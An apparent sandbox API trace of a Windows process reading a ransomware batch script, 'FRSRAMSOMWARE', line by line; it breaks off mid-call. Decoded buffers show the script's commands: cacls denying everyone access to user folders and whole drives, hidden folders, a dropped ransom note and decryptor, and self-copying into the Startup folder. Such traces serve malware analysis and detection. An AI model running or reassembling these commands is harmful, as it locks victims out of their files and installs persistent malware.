lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=1052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0122.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=64, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\%USERNAME%\\Pictures\\*.*\" /e /d everyone\r\n") returned 64 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0122.794] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.794] GetFileType (hFile=0x260) returned 0x1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x41c [0122.794] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=1103, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0122.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=51, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Users\\Public\\*.*\" /e /d everyone\r\n/d everyone\r\n") returned 51 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0122.794] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.794] GetFileType (hFile=0x260) returned 0x1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x44f [0122.794] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=1155, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0122.794] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=52, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\Program Files\\*.*\" /e /d everyone\r\nd everyone\r\n") returned 52 [0122.794] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0122.795] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.795] GetFileType (hFile=0x260) returned 0x1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x483 [0122.795] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=1193, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0122.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"C:\\*.*\" /e /d everyone\r\n /d everyone\r\n") returned 38 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0122.795] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.795] GetFileType (hFile=0x260) returned 0x1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4a9 [0122.795] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=1231, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0122.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"D:\\*.*\" /e /d everyone\r\n") returned 38 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0122.795] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.795] GetFileType (hFile=0x260) returned 0x1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4cf [0122.795] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=1269, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0122.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"E:\\*.*\" /e /d everyone\r\n") returned 38 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0122.795] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.795] GetFileType (hFile=0x260) returned 0x1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4f5 [0122.795] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.795] SetFilePointer (in: hFile=0x260, lDistanceToMove=1307, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0122.795] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=38, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo y|cacls \"F:\\*.*\" /e /d everyone\r\n") returned 38 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0122.796] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.796] GetFileType (hFile=0x260) returned 0x1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51b [0122.796] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=1315, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0122.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 3\r\nacls \"F:\\*.*\" /e /d everyone\r\n") returned 8 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0122.796] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.796] GetFileType (hFile=0x260) returned 0x1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x523 [0122.796] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=1317, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0122.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 3\r\n") returned 2 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0122.796] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.796] GetFileType (hFile=0x260) returned 0x1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x525 [0122.796] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=1321, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0122.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":3\r\n 3\r\n") returned 4 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0122.796] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.796] GetFileType (hFile=0x260) returned 0x1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x529 [0122.796] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=1342, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0122.796] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRSRAMSOMWARE\r\n /e /d everyone\r\n") returned 21 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0122.796] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.796] GetFileType (hFile=0x260) returned 0x1 [0122.796] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0122.797] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0122.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0122.797] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.797] GetFileType (hFile=0x260) returned 0x1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0122.797] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0122.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0122.797] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.797] GetFileType (hFile=0x260) returned 0x1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0122.797] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0122.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0122.797] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.797] GetFileType (hFile=0x260) returned 0x1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0122.797] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0122.797] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0122.797] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.797] GetFileType (hFile=0x260) returned 0x1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0122.797] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.797] SetFilePointer (in: hFile=0x260, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0122.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0122.798] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.798] GetFileType (hFile=0x260) returned 0x1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0122.798] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0122.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0122.798] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.798] GetFileType (hFile=0x260) returned 0x1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0122.798] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0122.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0122.798] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.798] GetFileType (hFile=0x260) returned 0x1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0122.798] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0122.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0122.798] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.798] GetFileType (hFile=0x260) returned 0x1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0122.798] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0122.798] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0122.798] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0122.798] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.798] GetFileType (hFile=0x260) returned 0x1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0122.799] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0122.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0122.799] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.799] GetFileType (hFile=0x260) returned 0x1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0122.799] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0122.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0122.799] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.799] GetFileType (hFile=0x260) returned 0x1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0122.799] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0122.799] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0122.799] _get_osfhandle (_FileHandle=3) returned 0x260 [0122.799] GetFileType (hFile=0x260) returned 0x1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0122.799] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0122.799] SetFilePointer (in: hFile=0x260, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 